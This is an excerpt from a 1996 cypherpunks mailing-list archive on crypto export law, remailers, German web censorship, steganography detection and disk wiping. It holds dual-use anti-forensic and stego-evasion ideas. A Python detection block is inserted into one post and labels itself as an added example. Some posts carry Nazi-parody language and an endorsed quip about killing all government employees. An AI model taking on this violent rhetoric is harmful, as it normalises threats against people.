http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case. Like Phil Karn's and Peter Junger's cases, this lawsuit really has the potential to outlaw the whole NSA crypto export scam. We intend to make your right to publish and export crypto software as well- protected by the courts as your right to publish and export books. It will probably take more years, and an eventual Supreme Court decision, to make it stick.
But this is the hearing at which we plan to convince our judge that these laws really are unconstitutional. Her order restoring our legal right to publish crypto source code could come out by Christmas! Please make a positive impression on the judge. Show her -- by showing up -- that this case matters to more people than just the plaintiff and defendant. Demonstrate that her decision will make a difference to society. That the public and the press are watching, and really do care that she handles the issue well. We'll have to be quiet and orderly while we're in the courthouse. There will be no questions from the audience (that's us), and no photography, but the session will be tape-recorded and transcribed, and you can take notes if you like. The lobby guards will want to hold onto guns, "munitions", and even small pocketknives, before they'll let you go upstairs to the courtrooms. So, here's your excuse to put on a nice costume, take an early lunch, and pay a call on the inner sanctum of our civil rights. See you there! John Gilmore PS: If you can't come, you can still contribute. Join EFF's Legal Defense Fund; see http://www.eff.org/pub/Alerts/cyberlegal_fund_eff.announce. From jbugden at smtplink.alis.ca Fri Sep 6 11:29:18 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 7 Sep 1996 02:29:18 +0800 Subject: FW: Anonymous phone calls (was: What is the EFF doing exa... Message-ID: <9608068420.AA842032641@smtplink.alis.ca> Subject: FW: Anonymous phone calls (was: What is the EFF doing exactly?) There is another spin possible on the reasons for replacement of pay phones with credit card phones. In Canada all new credit card phones are also able to take phone cards (which are anonymous). Using a prepaid phone card permits full anonymity. But what it also permits is metered local calls. This infrastructure would be more familiar to someone from Europe where metered local calls are the norm. 
Paris made the change to phones that *only* take prepaid phone cards (thus fully anonymous) ostensibly because people were breaking into phones for the money. Prepaid phone cards avoid this as well as collection costs. James Why should my long distance calling subsidize your local internet access? ;-) ---------- From: "" Sent: Friday, September 06, 1996 9:54 AM To: unicorn at schloss.li Cc: vznuri at netcom.com; cypherpunks at toad.com Subject: Re: What is the EFF doing exactly? Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there are less and less payphones, and all new ones installed, just about, are those yellow credit card phones. Not all of them, but it's now one for one, at least. From moe-san at stadt.com Fri Sep 6 11:38:00 1996 From: moe-san at stadt.com (D. Moeller) Date: Sat, 7 Sep 1996 02:38:00 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <32302DD6.43D3@stadt.com> Timothy C. May wrote: > > At 11:23 AM 9/5/96, Asgaard wrote: > Leftists are despicable. They steal our money, they corrupt our politics, > they nationalized our industries, they subvert our ideals, and they > undermine our national will. > The Democratic People's German Reich is fully justified in cutting off > contacts with subversive radical publications in Jew-dominated nations like > Holland. > As Reichskommander Schmidt points out: "The citizen-units who access > foreign Web sites will be rounded up and disposed of like the vermin they > are. We cannot allow the Revisionists and Leftists to triumph. We will send > them to the showers." > Heil Freeh! > --Klaus OK, I take the above as a sarcastic one. I took a longer view at the "to be blocked"-sites and to the declaration of the prosecutor. After all, I found the following facts: 1.)
The mentioned URLs DO contain material, which is "description and tolerating/praising of a terroristic act", describing the sabotage of a public railroad-line by using means of inflammables and reprogramming railroad-signs. They also used some "explosive-warning"-signs in order to simulate a possible positioned bomb. 2.) The aforementioned IS a felony according to ruling German law. 3.) It is NOT depending if these articles are Leftist's, Rightist's or else. According to German Law, the Attorney General is in charge for ANY extremistic/terroristic contents of pamphlets, books, or any other source of information. 4.) As you might know, we had a very bad time dealing with Leftist-Terrorists some 10-20 years ago. Therefore I can understand, that there exists a certain "oversensibility" dealing with any form of public terror. 5.) The "advice", given to the German ISPs, is IMO a very poor try to transfer ruling law to the "new medium", which is, as we all know and still try to improve, beyond control of governmental agencies. As soon as our stupid politicians will be aware of what the net really is (which should take 2-4 years) they will understand also, that pressing ISPs to blocking sites is no way of dealing with the problem. 6.) I personally think, that every individual has the right to gain access to every source of information, in order to build an opinion on their own. 7.) CUT THAT SHOWER SHIT! I can't take it anymore - all the time through school and now I'm grown up and still have to deal with this shit, even by Herr May ;-). That's what I think - come and beat me up ;-) Cheers Moe! -- D.
Moeller at WebLab U-Agency GmbH webadmin at stadt.com http://www.stadt.com/u-agency/ moe-san at elcafe.com http://www.elcafe.com/~moe-san/ From jya at pipeline.com Fri Sep 6 11:38:34 1996 From: jya at pipeline.com (John Young) Date: Sat, 7 Sep 1996 02:38:34 +0800 Subject: Co$ Buys EFF Message-ID: <199609061043.KAA16012@pipe1.t1.usa.pipeline.com> The New York Times, September 6, 1996, p. D2. Behind an Internet Message Service's Close Pressure From Church of Scientology Is Blamed for the Shutdown. A Finnish judge says different rules apply to E-mail. By Peter H. Lewis Pressure from the Church of Scientology International was at least partly responsible for the recent shutdown of a well-known Internet messaging service based in Helsinki, according to the Finnish operator of the service. The service, known by its Internet address, anon.penet.fi, was used by hundreds of thousands of people worldwide to send and receive electronic messages without divulging their true identities. It was the best known of a small, global network of special computers known as remailers, whose legitimate users include political dissidents, people with medical or drug ailments and others who want to communicate anonymously. Although previous news accounts had reported that the service was shut down because of accusations that it was a primary conduit for child pornography transmitted on the Internet, police investigators in Helsinki dismissed those accusations as groundless. The real reason for terminating the service, according to its founder and operator, Johan Helsingius, was a recent Helsinki court ruling that ordered him to reveal the true name of one of his system's users to the Church of Scientology. The judge held that under Finland's current telecommunications laws, Internet electronic mail does not carry the same privacy protections enjoyed by postal mail or telephone calls. 
The church, which in recent years has been trying to protect its copyrighted scriptures by trying to block their dissemination over computer networks, said an unknown person or persons had used the anon.penet.fi computer to illegally publish copyrighted church documents on Usenet, the global electronic bulletin board. Mr. Helsingius, a 35-year-old computer networking expert, has not yet revealed the name sought by the Scientologists, and said he planned to appeal the court ruling. But he said the court ruling opened the door for future subpoenas seeking the real names of anon.penet.fi users, and that he would rather close the system than spend all his time in court. Mr. Helsingius has operated anon.penet.fi for more than 3 years, handling over 7,000 messages a day. "In a sense I've done my pioneer work and it is now up to others to carry on," Mr. Helsingius said. Helena Kobrin, a Church of Scientology official, said the complaint against anon.penet.fi was just one of several actions the church had taken against the operators of remailer computers in Europe and the United States. She said the church has five lawsuits pending in the United States against remailer operators and users of remailers. "We have actively been in communication with various remailers about postings that have gone through their systems," said Ms. Kobrin, general counsel for the Religious Technology Center in Los Angeles, which is responsible for protecting the copyrights and trade secrets of unpublished Scientology scriptures. Earlier this year, another remailer, known as hacktic.nl, in the Netherlands, was shut down under pressure from the Scientologists. Unlike many other churches, the Church of Scientology, founded nearly 40 years ago by the science fiction author L. Ron Hubbard, regards its gospel as copyrighted material and a trade secret. Several courts have upheld the validity of the copyrights. 
Foes and critics of the church have used the Internet to publish the church documents, as well as other documents the church contends were stolen from its computers. The Religious Technology Center has also unsuccessfully attempted to put a stop to the forum on Usenet, alt.religion.scientology, where many of the copyrighted documents are published. A series of recent news articles in The Observer of London among others had linked the anon.penet.fi computer to accusations it was a conduit for child pornography. Mr. Helsingius, who has denied that his system is a conduit for child pornography, declined to speculate on the motives of the accusers. The accusations of child pornography first appeared several days after Mr. Helsingius declined to turn over to the court the name sought by the Scientologists. The Observer quoted Toby Tyler, identified as an adviser to the Federal Bureau of Investigation, as saying anon.penet.fi was the source for up to 90 percent of the child pornography on the Internet. But Richard P. (Toby) Tyler, a sergeant in the San Bernardino, Calif., County Sheriff's Department who said his involvement with the F.B.I. was minimal, said he was misquoted by the newspaper. Mr. Tyler, who has investigated pornography trafficking in cyberspace, said that most child pornography on the Internet did not pass through remailers. He did say, however, that of the small portion that does, 70 percent to 90 percent passes through anon.penet.fi. "I think that's a shame," Sergeant Tyler said upon learning that anon.penet.fi was closed. "I personally view its closing as a loss of freedom. I did not like the abuse of the remailer for child pornography, but I felt it served a necessary political purpose in this world." Ms. Kobrin of the Religious Technology Center said that despite its legal actions, the Church of Scientology does not oppose the operation of remailers, which are also known as anonymous servers. "We were not opposing the existence of his server," Ms. 
Kobrin said. "We have no opposition to there being anonymity for private, consensual communications. What we oppose is using anonymous servers for the purpose of permitting criminal or other unlawful acts. There has to be responsibility and accountability." [End] From nobody at cypherpunks.ca Fri Sep 6 12:01:59 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 7 Sep 1996 03:01:59 +0800 Subject: 16oz packages In-Reply-To: <199609061201.IAA04873@nrk.com> Message-ID: <199609061523.IAA29080@abraham.cs.berkeley.edu> David Lesher writes: > > One is now instructed to take these packages to a post-office mail > > clerk for mailing. > > > > (Of course it's unclear just what would be done if a package > > weighing over that magical 16ozs was left in a mailbox) > > They get sent back. What happens if there is no return address, or the return address is in another state? Do they throw out the package? Do they open it? Do they have a bomb squad destroy it (could get expensive if a lot of 16 oz packages are incorrectly mailed). From zachb at netcom.com Fri Sep 6 12:04:07 1996 From: zachb at netcom.com (Z.B.) Date: Sat, 7 Sep 1996 03:04:07 +0800 Subject: Test...sorry about this Message-ID: I'm just posting this to see if there's something wrong with my mail filter - it dumped a ton of messages from this list over the night, and I'm trying to figure out why the !@%$# it did that. Sorry for the interruption. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From jimbell at pacifier.com Fri Sep 6 12:28:12 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 03:28:12 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) Message-ID: <199609061607.JAA00624@mail.pacifier.com> At 10:08 AM 9/6/96 EST, jbugden at smtplink.alis.ca wrote: >There is another spin possible on the reasons for replacement of pay phones with >credit card phones. 
In Canada all new credit card phones are also able to take >phone cards (which are anonymous). Don't be too sure about the "anonymity" of these cards. You don't have to give your name when you buy or use them, but assuming a large number of phone calls (to, from different locations) can be associated together after the fact, your name can probably be fairly easily obtained. Jim Bell jimbell at pacifier.com From mycroft at actrix.gen.nz Fri Sep 6 13:03:33 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Sat, 7 Sep 1996 04:03:33 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: <199609051749.KAA12335@netcom20.netcom.com> Message-ID: <199609061342.BAA24447@mycroft.actrix.gen.nz> On Thu, 05 Sep 96 10:49:39 -0700, "Vladimir Z. Nuri" wrote: I have seen it repeated here often that somehow anonymity is some kind of a "right" that one should have in all kinds of different & important transactions, not merely on "cyberspace debate societies". I see here frequently the implication that *private*entities* that want to enforce identity in their own transactions are somehow implementing a corrupt, orwellian system. it sounded to me like that was all Dyson was advocating. The only time I've ever seen this point of view expressed on the list is when you and the other tentacles claim someone else is wrong for saying it (which they didn't, of course). No one has ever said "private entities" shouldn't be allowed to "enforce identity in their own transactions." This is exactly what Tim and others have been saying _should_ happen. Dyson, however, appears to be advocating some sort of identity tracking mechanism at the network level so that _all_ transactions are identifiable (albeit with some legal mechanism attempting to prevent "unauthorised" identification) regardless of whether the individuals involved want to enforce identity or not. Identification can be proved between the individuals concerned on a truly voluntary basis, without any such controls on the net. 
also, I think you are being slightly disingenuous in masking your own and other cpunks major objections to traceability, with the above, "this is all we really want". what about situations where the government requires you to give a physical identity for some kind of a license etc? do you think there are no such valid situations? is there any role for a government whatsoever in CryptoAnarchist Utopia and if so, is there any situation in which demanding physical identity is reasonable? If the government, or any other entity, requires identification it can be provided. I'm hard pressed to think of a situation in which the legitimate business of government (if any) actually requires identification. What do we need government to licence? -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- Paradise is exactly like where you are right now ... only much, much better. -- Laurie Anderson From jimbell at pacifier.com Fri Sep 6 13:05:37 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 04:05:37 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) Message-ID: <199609061607.JAA00614@mail.pacifier.com> At 01:46 AM 9/6/96 -0400, Donald E. Eastlake 3rd wrote: >Suggest you look at draft-eastlake-internet-payment-*.txt in the >IETF shadow directories. I don't think any one step will solve all >our spam problems but I wouldn't mind spending, say, 5 cents for each >real piece of mail I sent outside my company and if end machines charged >5 cents per piece of ouside mail received, I think spamming would be >crippled. (Note that with bad guy lists, you could collect the money and >then just throw away the mail.) Assuming we all agree that we're moving from a paper-based mail system to email, it is logical that "junk mail" will move as well. 
As I recall, statistics show that the average cost of a piece of junk mail is about $1 or so, including postage, printing, etc. It occurred to me a while back (and this proposal appears to be at least approximated by other proposals around here) that since companies are already saving a dollar, they should use some of those savings to "bribe" Internet-users into reading those (commercial) messages. Don't bother with all the details on how to verify this, just include digital cash along with the message, to be credited automatically to the recipient. Assuming the average Internet user already pays about $15 per month for access, he would only have to receive 2 emails a day which pay him 25 cents per, to pay for this service. At that point, his Internet access would be free, at least somewhat analogous to free TV which is paid for by commercials. Everybody's ahead, except for the postman, the printer, etc. Jim Bell jimbell at pacifier.com From jk at stallion.ee Fri Sep 6 13:16:48 1996 From: jk at stallion.ee (Jüri Kaljundi) Date: Sat, 7 Sep 1996 04:16:48 +0800 Subject: electronic offshore banking Message-ID: Are there any good offshore banks that would allow you to use your account over the Internet? I know European Union Bank www.eub.com is one of those available, but their US$ 25.000 minimum deposit is too stupid. Jüri Kaljundi AS Stallion jk at stallion.ee From tcmay at got.net Fri Sep 6 13:32:07 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 04:32:07 +0800 Subject: Reputations Message-ID: At 1:11 AM 9/6/96, Greg Burk wrote: >> I strongly disagree. It's quite possible for Person A to quickly convert >> his reputation to Person B to a _negative_ value. Real quick, in fact. > >I don't see how there can be such a thing as negative reputation >capital. Wouldn't that mean B believes the opposite of what A says? If >you anti-believed someone in a consistent manner, couldn't they exploit >that? 
Well, I suppose that if you don't believe in negative reputation capital, I'm not going to be able to spend enough time to convince you. It's like someone saying they're not sure such a thing as "entropy" exists. >For instance, when a certain infamously-low-reputation (deservedly so) >individual recently joined the cypherpunk lists, others who had endured >him in the past tried to relay their impressions of him. It proved very >difficult to convey, and they were somewhat attacked for their efforts >and not entirely believed. > >In other words, he *could not* spend down to 0, despite years of >unflagging effort. No, with many of the list members, his reputation was in fact negative. They disbelieved nearly anything he had to say, and his approval of some idea was largely cause for others to take the opposite tack. About as clear an example of a negative reputation as one can find. (Note that I am not saying his reputation is negative with _me_.) >I've already made the points I wanted to make, so I may not have further >comments. Nor me. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jehill at gauss.elee.calpoly.edu Fri Sep 6 14:06:09 1996 From: jehill at gauss.elee.calpoly.edu (Joshua E. Hill) Date: Sat, 7 Sep 1996 05:06:09 +0800 Subject: Steganography -- Tell Tale Signs? In-Reply-To: Message-ID: <199609061702.KAA02054@hyperion.boxes.org> > 1) If I hide some PGP encrypted data in a > gif, jpg or wav file will there be any tell tale > signs to the naked eye of an expert? If yes, > what are they? 
naked eye: no... but if an expert is looking (for any reason) they would probably check out the low order bits, regardless... and although the actual message appears random, PGP has some headers which are _definitely_ not random... In fact, they are trivial to check for. Look for Stealth-PGP (A separate product for now... to be integrated with PGP 3.0) The idea behind Stealth-PGP is that there are no headers... so the entire data stream is random... > 3) Are there any tools at the moment > to expose (not crack) the hidden encrypted > data? If none. are there tools in development? sure enough... There are several rather accepted stego formats... If they can use one of the known forms of stego, and extract a PGP-looking message, you are going to be hard pressed to "plausibly deny" anything. If you _do_ use Stealth-PGP (or some other raw encryption method), the low ordered bits would appear to be random... Now, I'm not certain about this, but I doubt that the low order bits of any given regular file are really as random as a good crypto algorithm is. I'd imagine that there are ways of statistically analyzing the low order bits of a file, and seeing if they're random... If they are completely random, then there is probably something hidden there... and if they are completely ordered, then there is probably something hidden there... In the "next generation" stego tools, there will probably be options to hide data in noise that looks similar to the native noise of the medium... a sort of subliminal channel in the noise (more so than regular stego). Until then you'll have to rely on "gee... what do you mean 'completely random'" ;-) Joshua -----------------------------Joshua E. Hill----------------------------- | LAWS OF COMPUTER PROGRAMMING: | | X. Adding manpower to a late software project makes it later. 
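The two checks the message above describes (a fixed PGP packet header recoverable from the low-order bits, and how random those bits look), sketched in Python as an added example that is not part of the original post. The smooth carrier, the payload, the key ID and every function name are constructed for illustration, and only the old-format public-key-encrypted packet that PGP 2.x writes first is recognised.

```python
import random


def lsb_bytes(samples):
    """Pack the least significant bit of each sample into bytes, MSB first."""
    out = bytearray()
    usable = len(samples) - len(samples) % 8
    for i in range(0, usable, 8):
        byte = 0
        for s in samples[i:i + 8]:
            byte = (byte << 1) | (s & 1)
        out.append(byte)
    return bytes(out)


def pgp_header_at_start(data):
    """True if data opens with an old-format public-key-encrypted packet.

    Layout checked: packet tag byte (bit 7 set, bit 6 clear, tag 1), a
    one- or two-byte length, a version byte of 2 or 3, an 8-byte key ID,
    then algorithm byte 1 (RSA). Random data passes by chance only about
    once in 10^7 tries, which is why the header is such a strong tell.
    """
    if len(data) < 13:
        return False
    ctb = data[0]
    if not ctb & 0x80 or ctb & 0x40:
        return False                      # not an old-format packet header
    tag, length_type = (ctb >> 2) & 0x0F, ctb & 0x03
    if tag != 1 or length_type > 1:
        return False
    body = 2 if length_type == 0 else 3   # offset of the version byte
    return data[body] in (2, 3) and data[body + 9] == 1


def adjacent_lsb_agreement(samples):
    """Fraction of neighbouring samples whose low bits are equal.

    Close to 0.5 for cipher-like bits; a smooth carrier sits well away
    from 0.5. Noisy sensors can also approach 0.5, so treat the value as
    a hint to look closer, not as proof.
    """
    same = sum(1 for a, b in zip(samples, samples[1:]) if (a ^ b) & 1 == 0)
    return same / (len(samples) - 1)


def triage(samples):
    """Run both checks on one carrier and return the findings."""
    return {
        "pgp_header": pgp_header_at_start(lsb_bytes(samples)),
        "lsb_agreement": round(adjacent_lsb_agreement(samples), 3),
    }


def embed_for_test(samples, payload):
    """Build constructed test input: overwrite low bits with payload bits."""
    bits = [(b >> (7 - k)) & 1 for b in payload for k in range(8)]
    if len(bits) > len(samples):
        raise ValueError("carrier too small for payload")
    out = bytearray(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


# Constructed payload: a PGP-2.x-style header followed by pseudo-random
# bytes standing in for ciphertext. The key ID is made up.
rng = random.Random(1996)
PAYLOAD = (bytes([0x85, 0x00, 0x8C, 0x02])        # tag byte, length, version
           + bytes(range(0x10, 0x18))             # constructed 8-byte key ID
           + bytes([0x01])                        # algorithm 1 = RSA
           + bytes(rng.randrange(256) for _ in range(243)))

# Constructed carrier: a slow gradient, so its low bits are highly ordered.
COVER = bytes((i // 4) % 256 for i in range(8 * len(PAYLOAD)))
STEGO = embed_for_test(COVER, PAYLOAD)

if __name__ == "__main__":
    print("cover:", triage(COVER))
    print("stego:", triage(STEGO))
```
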
| -------jehill@.calpoly.edu-------- From jad at dsddhc.com Fri Sep 6 14:06:57 1996 From: jad at dsddhc.com (John Deters) Date: Sat, 7 Sep 1996 05:06:57 +0800 Subject: What the NSA is patenting Message-ID: <2.2.32.19960906165918.0073d060@labg30> At 01:26 AM 9/3/96 -0500, Bruce Schneier wrote: >I just spent a pleasant hour or so searching a patent database for all >patents assigned to the NSA. There's some interesting stuff: > > "Self-locking, tamper-evident package" > Method of retrieving documents that concern the same topic" > >Fifty-Four patents total. (Used to be they just kept stuff secret; now >they patent some of it.) Attached is the most interesting thing I found: a >patent on techniques for reading data off overwritten magnetic media. > >Bruce [ Interesting patent deleted ] This method implies that they have the ability to scan the entire platter surface at resolution level that is basically atomic. From lots of experience gained from working with metalworking machinery, it sounds like some of the old magnetic data might be leaving traces behind by a process called "backlash". It happens because machines don't realign themselves precisely, unless the lead-in steps are repeated every time. A fairly simple demonstration of this can be found on most dot-matrix printers. They usually have a mode called "uni-directional" printing, where the printhead puts dots on the paper only when travelling from left-to-right. This is used to improve the quality of a graphic image. Print a simple pattern of repeating vertical bars (||||||) across the page and down several lines with this mode turned off, and you'll probably notice the lines tend to not line up perfectly. Turn uni-directional printing on, and watch the behavior of the printhead. It will "home" itself to the far left side before printing the next line of bars. The bars will then be lined up "better" than in the bi-directional print. 
We should be able to use this feature to our advantage to write a "backlash-enhanced" wipedisk driver. The wipedisk utilities I've seen today primarily consist of repeatedly writing a pattern such as 0x55555555, then 0xAAAAAAAA, then 0xFFFFFFFF, then 0x00000000. While this will probably eradicate most of the traces of the original data, it's all happening "unidirectionally" -- starting at the first sector of the file, write this data till all the sectors have been overwritten. Given that the original data may have been written in reverse sector order, or reverse cylinder motion order, or after a large cylinder change, the wipedisk might still leave traces remaining on the disk. Using the above example of printing vertical bars, imagine having each line print three times using the unidirectional mode, and randomly picking one line out of the entire array to print bi-directionally. It'll stand out like a sore thumb. That's what I think they're looking for with their data recovery method. What would probably make for a more secure wipe utility would be to alter the "head approach path" prior to making each of the passes described above. So, before overwriting the sectors in order from 0 to EOF full of 0x55555555s, have the head move to the 0th cylinder first. Before overwriting the sectors in order from 0 to EOF with 0xAAAAAAAAs, have the head move to the last cylinder beforehand. Repeat for the 0xFFFFFFFF and 0x00000000 sectors, except overwrite the sectors in order from EOF to 0. All this pre-writing motion could theoretically reduce the repeatability of the drive head positioning arm as well as possibly hitting different rotational sync points, using the backlash effect to its fullest extent. Of course, the biggest problem will be that of overcoming intelligent disk controllers. No self-respecting SCSI drive is going to voluntarily swing the disk head around inefficiently, and I don't know enough about how IDE works to say anything different about it. 
I hope some hardware hacker who knows their low-level stuff will be able to write a secure disk wiper. John -- J. Deters "Captain's log, stardate 25970-point-5. I am nailed to the hull." +-------------------------------------------------------+ | NET: jad at dsddhc.com (work) jad at pclink.com (home) | | PSTN: 1 612 375 3116 (work) 1 612 894 8507 (home) | | ICBM: 44^58'36"N by 93^16'27"W Elev. ~=290m (work) | | PGP Key ID: 768 / 15FFA875 | +-------------------------------------------------------+ From kadafi at netcom.com Fri Sep 6 14:07:48 1996 From: kadafi at netcom.com (Flying insect killer) Date: Sat, 7 Sep 1996 05:07:48 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) In-Reply-To: <199609061607.JAA00624@mail.pacifier.com> Message-ID: On Fri, 6 Sep 1996, jim bell wrote: > At 10:08 AM 9/6/96 EST, jbugden at smtplink.alis.ca wrote: > >There is another spin possible on the reasons for replacement of pay phones with > >credit card phones. In Canada all new credit card phones are also able to take > >phone cards (which are anonymous). > > Don't be too sure about the "anonymity" of these cards. You don't have to > give your name when you buy or use them, but assuming a large number of > phone calls (to, from different locations) can be associated together after > the fact, your name can probably be fairly easily obtained. > Jim Bell > jimbell at pacifier.com And phone companies that offer phone cards keep track of every call that goes thru each card number. From wendigo at pobox.com Fri Sep 6 14:18:22 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Sat, 7 Sep 1996 05:18:22 +0800 Subject: [NOISE] Neo-Nazis etc. 
In-Reply-To: <322F9867.7FEF@gte.net> Message-ID: <199609061711.NAA05404@charon.gti.net> An entity claiming to be Dale Thorn wrote: : : Try to keep in mind that "Nazis" aren't skinheads and other : troublemakers exactly, which is to say, those are the first people : Hitler got rid of when he came to power. : : Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we : know anyone like that? : Reminded me of the following: "You think swastikas are cool. The real Nazis run your school; They're coaches, businessmen, and cops. In a real Fourth Reich, you'd be the first to go." -- Dead Kennedys "Nazi Punks F*** Off" mark -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO From jimbell at pacifier.com Fri Sep 6 14:22:41 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 05:22:41 +0800 Subject: Race Bit: C Message-ID: <199609061750.KAA06787@mail.pacifier.com> At 05:05 AM 9/6/96 +0000, jonathon wrote: >On Thu, 5 Sep 1996, jim bell wrote: > >> The way I see it, the status quo doesn't come "pre-justified": It needs >> just as much a defense as any other proposal. 
Its main advantage is that it >> tends to be more understood than most hypotheticals, because it's been > >More understood, and just more accepted, because alternatives >are hard to conceive, and even harder to popularize, without >lots of red liquid running in the streets? Since red liquid running in the streets is generally so reviled, one of the things which mystifies me is why there aren't more simulation-type programs used to test out hypotheticals, for example a "SimEconomy." For example, you'll occasionally hear about a media news organization gathering a dozen or so volunteers in a room, and asking them to solve a problem like "The Budget Deficit" or some such. The result of their interplay is generally used to explain why these problems are hard to solve. I, for one, would love to be able to program in an immediate 25%+ reduction in military spending (added to that a 5%/year cumulative cut after that for 10+ years), a 5% cut then a cap on Socialist Insecurity, 5% per year (cumulative,for 10 years) of reduction in welfare, along with similarly substantial cuts/caps in Medicare and a few other features. Obviously, a computer-based simulation wouldn't just blindly do the cuts, but would also estimate the secondary and tertiary effects of such cuts, for example spending in areas whose economies are traditionally dependent on defense programs, etc. I'm not saying that I think these changes would be _easy_, politically, but if the average citizen were made aware of how simple the changes were, he'd be less tolerant of special-interest politics. > On second thoughts, let's just terminate > with extreme prejudice, each and every individual > who has worked in any capacity for any part of any > government agency in the us -- regardless of whether it > was federal, state or local, and regardless of whether > they were president, janitor, or clerk. > All people in the employ of government agencies are death-dealers. 
I hope you don't expect me to argue with this B^) Jim Bell jimbell at pacifier.com From tcmay at got.net Fri Sep 6 14:30:54 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 05:30:54 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: At 8:18 AM 9/6/96, tank wrote: >Please forward: > * * * P R E S S R E L E A S E * * * > > >GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES > > >German internetproviders, joined in the Internet Content Taskforce >(ICTF), started censoring the Dutch website www.xs4all.nl, containing >3100 personal and commercial homepages. This act of censorship is >caused by the webpage of a magazine that is banned in Germany, Radikal >(http://www.xs4all.nl/ ~tank/radikal/). ... Though my German friends will perhaps feel I am picking on them, this is not so (this week Germany is in the hot seat, last week it was Singapore....). A Modest Proposal: * as Germany is bent on blocking sites which carry this subversive pamphlet, "Radikal," let us mirror it on thousands of sites around the world. * when the Germans went into Danmark and insisted Jews wear badges, ordinary citizens (and the Danish Royal Family, as I recall) also took to wearing these Star of David badges. * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now attached to so many pages were to be joined by a "Star of David"? This Star of David symbol could mean "We support freedom to read, and our site contains the "Radikal" publication which Germans are forbidden to access." (I know nothing of how such symbolic campaigns are actually launched and managed, so I'm suggesting the hint of an idea. I do think mirroring the banned publication (_any_ banned publication, by _any_ government) on as many sites as possible is a Good Idea.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Fri Sep 6 14:35:42 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 05:35:42 +0800 Subject: "The Bill of Rights can be dangerous...." Message-ID: At 2:30 PM 9/5/96, Omegaman wrote: >What strikes me as odd is that the arguments against anonymous >communication are nearly identical to those against strong crypto. >ie. the same four horsemen flare up in these discussions. Yet we >have parties who are ostensibly pro-crypto but anti-anonymity. > >To put it in a nutshell, in a free society I can have a private >conversation, but I must essentially announce that I am having one >and who I am having that conversation with? As with Adam Back's mini-rant yesterday, this is exactly correct. In a free society, speech need not be approved, registered, escrowed, labelled, or identified with the Registered True Name of the speaker. One can paraphrase Esther Dyson's concerns about anonymity in several fairly equivalent forms. Here's the original: "Anonymity can be dangerous -- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing anonymity -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." Here's a slightly paraphrased version for freedom to read anonymously, with some "reasons" included in brackets: "Books and magazines can be dangerous [bomb recipes, racial hatred, instilling bad values, etc.]-- as can restrictions on reading, especially in/by repressive regimes. 
Therefore I would favor allowing unfettered reading -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (i.e., "book escrow," where one's reading materials are escrowed with Trusted Authorities, and only accessed by law enforcement under Proper Conditions. Failure to escrow reading materials would be a Class B felony. Cf. the FBI's Library Awareness Program of circa 1987-8.) A version for freedom of movement: "People moving around can be dangerous [avoiding parental responsibilities, avoiding taxes, spying, plotting to bomb buildings]-- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing freedom of movement -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (a la the "position escrow system" I predicted a couple of years ago would someday be seriously considered) A version for freedom of association: "Freedom of association can be dangerous [plotting of crimes, gathering of mobs, spread of dangerous ideas, disease]-- as can restrictions on such gatherings, especially in/by repressive regimes. Therefore I would favor allowing freedom of association -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." ("Club escrow"? All mailing lists, clubs, associations, and such would have to escrow an up-to-date list of members, associates, and contacts. Then, with proper authorization by proper authorities, law enforcement could inspect these lists to see who had been meeting with whom. Hotels would have to monitor use of rooms by more than two persons (the two person case is already covered by the "Sex can be dangerous..." variant of the Dyson Principle).) A version for anonymous purchases and sales: "Anonymity in sales and purchases can be dangerous [bomb materials, stolen goods, unhealthful foods, etc.] 
